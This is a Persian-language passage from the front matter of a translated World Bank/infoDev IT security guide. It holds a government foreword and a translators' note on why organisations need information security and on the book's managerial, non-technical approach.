ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻏﺎﺯ ﺷﺪﻩ ﻭ ﺭﺷﺪ ﺳﺮﻳﻌﻲ ﻳﺎﻓﺘﻪ ﺍﺳـﺖ .ﻧﺘـﺎﻳﺞ ﻣﻄﺎﻟﻌـﺎﺕ ﻛـﺎﺭﮔﺮﻭﻩ ﻣـﺮﺗﺒﻂ ،ﻣﻨﺠـﺮ ﺑـﻪ
ﺷﻨﺎﺧﺖ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻭﺳﻴﻌﺘﺮ ﻧﻴﺎﺯ ﮔﺮﺩﻳﺪ ﻭ ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﺑﺎ ﺗﺼﻮﻳﺐ ﻫﻴﺄﺕ ﻣﺤﺘﺮﻡ ﺩﻭﻟﺖ ﻭ ﺭﺋﻴﺲ ﻣﺤﺘﺮﻡ ﺟﻤﻬـﻮﺭ ،ﺷـﻮﺭﺍﻱﻋـﺎﻟﻲ ﺍﻣﻨﻴـﺖ
ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﺸﻮﺭ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﻌﺎﻭﻥ ﺍﻭﻝ ﻣﺤﺘﺮﻡ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺍﻧﺸﺎﺍﷲ ﺑﺰﻭﺩﻱ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎ
ﻭ ﺗﺼﻤﻴﻤﺎﺕ ﺩﺭ ﻗﺎﻟﺐ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺳﻨﺪ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺸﻮﺭ ﺍﻋﻼﻡ ﻣﻲﮔﺮﺩﺩ.
ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺩﺭ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺗﻼﺵ ﺩﺍﺭﺩ ﺗﺎ ﺑﺎ ﺗﻬﻴـﻪ ،ﺗﺮﺟﻤـﻪ ﻭ ﺗـﺄﻟﻴﻒ ﻣﻄﺎﻟـﺐ ﻓﻨـﻲ ﺩﺭ ﻣﺤـﻴﻂ
ﻣﻨﺎﺳﺐ ﻧﺴﺒﺖ ﺑﻪ ﺗﻘﻮﻳﺖ ﺩﺍﻧﺶ ﻣﻮﺟﻮﺩ ﻛﺸﻮﺭ ﺩﺭ ﻗﻠﻤﺮﻭﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﺪ .ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﺟﻤﻠﻪ ﺍﺳﻨﺎﺩ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ،ﺟـﺎﻣﻊ
ﻭ ﻣﺘﺄﺧﺮ ﺩﺭ ﻗﻠﻤﺮﻭ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ICTﻛﺸﻮﺭ ﻫﺪﻳﻪ ﻣﻲﮔﺮﺩﺩ.
ﻧﺼﺮﺍﷲ ﺟﻬﺎﻧﮕﺮﺩ
ﺩﺑﻴﺮ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ
ﻧﻤﺎﻳﻨﺪﻩ ﻭﻳﮋﻩ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ
ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ
ﺍﺳﺘﻔﺎﺩﺓ ﺩﺭﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺻﺤﻴﺢ ،ﻳﻜﻲ ﺍﺯ ﻧﻴﺎﺯﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﺍﻫـﺪﺍﻑ ﺳـﺎﺯﻣﺎﻧﻲ ﺍﺳـﺖ ﻭ ﻗﺎﺑﻠﻴـﺖ
ﺍﻃﻤﻴﻨﺎﻥ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ،ﺍﺯ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺩﺭ ﮐـﺎﺭﺁﻳﻲ ﺁﻧﻬـﺎ ﻫـﺴﺘﻨﺪ .ﻣﺰﺍﻳـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮐﺎﺭﺑﺮﺩ ﻭﺳﻴﻊ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺭﺍ ﻧـﺎﮔﺰﻳﺮ ﮐـﺮﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺑـﻮﻳﮋﻩ
ﺍﻳﻨﺘﺮﻧﺖ ،ﺗﻐﻴﻴﺮﺍﺕ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭ ﺭﻭﻧﺪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﮐﻪ ﺣﺠﻢ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻳﻚ ﺳـﺮ
ﺍﻧﮕﺸﺖ ﺑﺎ ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؛ ﻭ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﭘﻴﭽﻴـﺪﻩ ﺑـﺎ ﺍﻳـﻦ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭﺳـﻴﻊ ،ﻣﺨـﺎﻃﺮﺍﺕ ﮔـﺴﺘﺮﺩﻩﺍﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ،ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﮐﻨﻨﺪ.
ﺩﺭ ﺩﻧﻴﺎﻱ ﺍﻣﺮﻭﺯ ،ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺎﻟﻲ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﺑﺼﻮﺭﺕ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺟﺎﺑﺠﺎ ﻣﻲﺷﻮﻧﺪ ،ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺑﺎ ﺣﺴﺎﺳﻴﺘﻬﺎﻱ ﮐﻢ ﻭ ﺯﻳـﺎﺩ
ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﮑﻪﻫﺎ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ،ﺳﺎﻣﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻭ ﻣﺮﺗﺒﻂﺗﺮ ﺑـﺎ ﺩﻧﻴـﺎﻱ ﺑﻴﺮﻭﻧـﻲ ﻣـﻲﮔﺮﺩﻧـﺪ ،ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﺎﺩﺓ ﻧﻔﻮﺫ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺎﺟﺮﺍﺟﻮﻳﺎﻥ ﻭ ﺟﻨﺎﻳﺘﮑﺎﺭﺍﻥ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻗﺮﺍﺭ
ﺩﺍﺭﺩ؛ ﻭ ﻫﺮﻳﮏ ﺍﺯ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﺧﻮﺩ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺩﻟﻴﻞ ﻣﺤﮑﻤﻲ ﺑﺮﺍﻱ ﺟﺪﻱ ﮔﺮﻓﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺍﺳﺖ.
ﺍﮐﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﻮﺍﻉ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺧﺮﺍﺑﮑﺎﺭﺍﻥ ﻫﺴﺘﻨﺪ؛ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻮﻥ ﺩﺳﺘﮑﺎﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﺮﺟﻊ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ .ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ،ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﺷـﻤﺎﺭ
ﺭﻭﻧﺪ )ﻣﺜﻞ ﺳﺮﻋﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ( ،ﺍﮔﺮ ﺗﺤﺖ ﮐﻨﺘﺮﻝ ﻧﺒﺎﺷﻨﺪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺷﻮﻧﺪ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﺪﻧﻴﺖ
ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻧﻔﻮﺫ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻴﺎﻧﺠﺎﻣﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﻣﺸﻜﻼﺕ ﻃﺒﻴﻌـﻲ ﻭ ﺧﻄﺎﻫـﺎﻱ ﻏﻴﺮﻋﻤـﺪﻱ ﻛـﻪ ﺗﻮﺳـﻂ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ،ﺩﺭﺻﻮﺭﺕ ﻓﻘﺪﺍﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻣﺨﺮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ.
ﺩﺭ ﮐﻨﺎﺭ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ،ﻣﻮﺿﻮﻉ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺮ ﭘﻴﭽﻴﺪﮔﻲ ﮐﺎﺭ ﺩﻭﻟﺘﻬـﺎ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺣﻴﺎﺗﻲ ﺧﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﻣﻲﺍﻓﺰﺍﻳﺪ ،ﻭ ﺍﻫﻤﻴﺖ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻭﻟﺘﻲ ،ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺻﺤﻴﺢ ﻭ ﻣﺆﺛﺮ ﺁﻧﻬﺎ ﺑﻪ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﻭ
ﭼﻨﺪﺍﻥ ﻣﻲﮐﻨﺪ .ﺁﺧﺮﻳﻦ ﺁﻣﺎﺭﻫﺎﻱ ﺟﻬﺎﻧﻲ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺩﻭﻟﺘﻲ ﻭ ﺗﺠﺎﺭﻱ ﻛﻪ ﺗﻮﺳـﻂ ﻭﻳـﺮﻭﺱ ،ﻛـﺮﻡ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ
ﺳﺮﻭﻳﺲ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪ ،ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺧﻮﺑﻲ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ .ﻃﺒﻖ ﺗﺨﻤﻴﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ
)ﮐﻪ ﺑﻌﻨﻮﺍﻥ ﭘﻴﺸﺮﻭ ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ،ﺗﻨﻬـﺎ ﺩﺭ ﺳـﺎﻝ ۲۰۰۳ﺿـﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪﻥ ﺍﻣﻨﻴـﺖ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻟﻎ ﺑﺮ ۱۰ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺁﻭﺭﺩ ﺷﺪﻩ ﺍﺳﺖ.
ﺑﺎ ﺍﻳﻦ ﺍﻭﺻﺎﻑ ،ﺗﺪﻭﻳﻦ ﻭ ﺍﺟﺮﺍﻱ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺩﻩ ،ﺿﺮﻭﺭﺗﻲ ﺍﺟﺘﻨﺎﺏ ﻧﺎﭘـﺬﻳﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﺤـﺴﻮﺏ
ﻣﻲﺷﻮﺩ .ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ ،ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺩﺭ ﺣـﺪ
ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ ﻧﮕﻪ ﺩﺍﺭﻧﺪ ،ﻭ ﻗﺎﺑﻠﻴﺖ ﻭﺍﮐﻨﺶ ﺳﺮﻳﻊ ﻭ ﻣﺆﺛﺮ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ ﺗﺎ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦ-
ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮐﻨﻨﺪ ﺗﺎ ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺍﻳﻤﻨﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﮐﺴﺐ ﻭ ﮐﺎﺭ ﺑﺎ ﺧﻴﺎﻟﻲ ﺁﺳﻮﺩﻩﺗﺮ ﺗﺪﺍﻭﻡ ﻳﺎﺑﺪ.
"ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﭘﺲ ﺍﺯ ﺩﺭﮎ ﺿﺮﻭﺭﺕ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ،ﺑﻪ ﺳﻔﺎﺭﺵ ﺑﺎﻧﮏ ﺟﻬـﺎﻧﻲ ﻭ ﺗﻮﺳـﻂ ﮔـﺮﻭﻩ
) infoDevﻳﮑﻲ ﺍﺯ ﺯﻳﺮﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺑﺎﻧﮏ ﺟﻬﺎﻧﻲ( ﻭ ﺑﻪ ﻋﻨﻮﺍﻥ ﺗﻼﺷﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﮐـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺩﺭ
ﺍﻳﻦ ﻧﻬﺎﺩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﺪﻭﻳﻦ ﻭ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦﺑﺎﺭ ﺩﺭ ﺍﺟﻼﺱ ﻧﺨﺴﺖ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ) (WSISﺩﺭ ﺳـﻮﺋﻴﺲ ،ﺩﺭ ﺩﺳـﺎﻣﺒﺮ ﺳـﺎﻝ ۲۰۰۳
ﻣﻴﺎﻥ ﺷﺮﮐﺖﮐﻨﻨﺪﮔﺎﻥ ﺗﻮﺯﻳﻊ ﺷﺪ .ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ﺣﺎﺻﻞ ﺑﺮﺭﺳﻲ ﮐﺘﺎﺑﻬـﺎ ،ﻣﻘـﺎﻻﺕ ،ﺭﺳـﺎﻟﻪﻫـﺎ ،ﻭ ﻣـﺴﺘﻨﺪﺍﺕ ﺗﺨﺼـﺼﻲ ﺯﻳـﺎﺩﻱ ﺍﺯ
ﮐﺎﺭﺷﻨﺎﺳﺎﻥ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺣﻮﺯﻩ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺍﺳﺖ .ﻓﻬﺮﺳﺖ ﮐﺎﻣﻠﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺟـﻊ ﺩﺭ ﺑﺨـﺶ ﺷـﺸﻢ )ﭘﻴﻮﺳـﺘﻬﺎ( ﺁﻣـﺪﻩ ﺍﺳـﺖ ﮐـﻪ
ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﺤﺘﺮﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﮑﺎﺕ ﻭ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻴﺰ ﺁﮔﺎﻫﻲ ﻳﺎﺑﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٠
ﮐﺘﺎﺏ ﺣﺎﺿﺮ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﮑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻌﺎﺭﻳﻒ ﻭ ﺭﺍﻫﮑﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﻋﻤﻮﻣﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﮐﺮﺩﻩ ،ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺁﻧﻬﺎ ﺭﺍ ﻧﻴﺰ
ﻣﺪﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ ﻭ ﺩﺭ ﻣﺘﻦ ﺍﻭﻟﻴﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﺮﺟﻤﺔ ﺁﻥ ﺗﻼﺵ ﺷﺪﻩ ﺗﺎ ﺣﺪ ﺍﻣﮑﺎﻥ ﻣﻄﺎﻟﺐ ﺑﮕﻮﻧﻪﺍﻱ ﻋﻨﻮﺍﻥ ﺷﻮﻧﺪ ﮐـﻪ ﻓﻬـﻢ ﻭ ﺩﺭﮎ
ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧﺶ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﮐﺎﺭ ﺟﺎﻣﻌﺔ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ )ﺧﺼﻮﺻﹰﺎ ﻣـﺪﻳﺮﺍﻥ(
ﺑﻴﺎﻳﺪ ،ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻥ ﺳﺮﻓﺼﻠﻬﺎﻳﻲ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮐﻮﺗﺎﻩﻣﺪﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ.
ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ،ﮐﺘﺎﺑﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻨﺘﺸﺮ ﻭ ﺑﺘـﺎﺯﮔﻲ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺗﻮﺳـﻂ
ﻻ ﭼﻮﻥ ﺑﻪ ﻣﻮﺿﻮﻋﻲ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ ،ﻓﺎﻗـﺪ ﻧﮕـﺎﻩ ﻣﺘﺮﺟﻤﺎﻥ ﺑﺎﺗﺠﺮﺑﻪ ﻭ ﻳﺎ ﺟﻮﺍﻥ ﺑﻪ ﻓﺎﺭﺳﻲ ﺗﺮﺟﻤﻪ ﺷﺪﻩ ،ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ
ﮐﻼﻥ ﻭ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ .ﮐﺘﺎﺑﻲ ﮐﻪ ﭘﻴﺶ ﺭﻭﻱ ﺷﻤﺎ ﺍﺳﺖ ،ﺑﺎ ﻧﮕﺎﻩ ﮐﻼﻥ ﺑﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ،ﮐﻮﺷﻴﺪﻩ ﻣﻔﺎﻫﻴﻢ ﻣﻄـﺮﺡ ﺩﺭ
ﻫﺮﻳﮏ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﺁﻧﺮﺍ ﺷﺮﺡ ﺩﻫﺪ ،ﻭ ﺁﻧﺠﺎ ﮐﻪ ﻻﺯﻡ ﺑﻮﺩﻩ ﺍﺯ ﺑﺮﺭﺳﻲ ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﻧﻴﺰ ﻏﺎﻓﻞ ﻧﺸﺪﻩ ،ﻫﺮﭼﻨﺪ ﻫﻴﭽﮕﺎﻩ ﺁﻧﭽﻨﺎﻥ ﻭﺍﺭﺩ ﻣﺴﺎﺋﻞ
ﻓﻨﻲ ﻧﺸﺪﻩ ﮐﻪ ﮐﻼﻥﻧﮕﺮﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ،ﻭ ﺍﻳﻨﮑﺎﺭ ﺭﺍ ﺑﻪ ﮐﺘﺎﺑﻬﺎﻱ ﺗﺨﺼﺼﻲ ﺍﻣﻨﻴﺖ ﻭﺍﮔﺬﺍﺭ ﮐﺮﺩﻩ ﺍﺳﺖ.
ﻣﺘﺮﺟﻤﺎﻥ ﺍﻳﻦ ﺍﺛﺮ ﻫﻤﻮﺍﺭﻩ ﮐﻮﺷﻴﺪﻩﺍﻧﺪ ﺗﺎ ﺩﺭ ﺍﻧﺘﻘﺎﻝ ﻣﻔﺎﻫﻴﻢ ﻭ ﻧﮑﺎﺕ ﺍﻳﻦ ﮐﺘﺎﺏ ،ﺣﻔﻆ ﺍﻣﺎﻧﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﻫﻴﭽﮕﺎﻩ ﻣﻌﺎﻧﻲ ﺭﺍ ﻓـﺪﺍﻱ ﺍﻟﻔـﺎﻅ
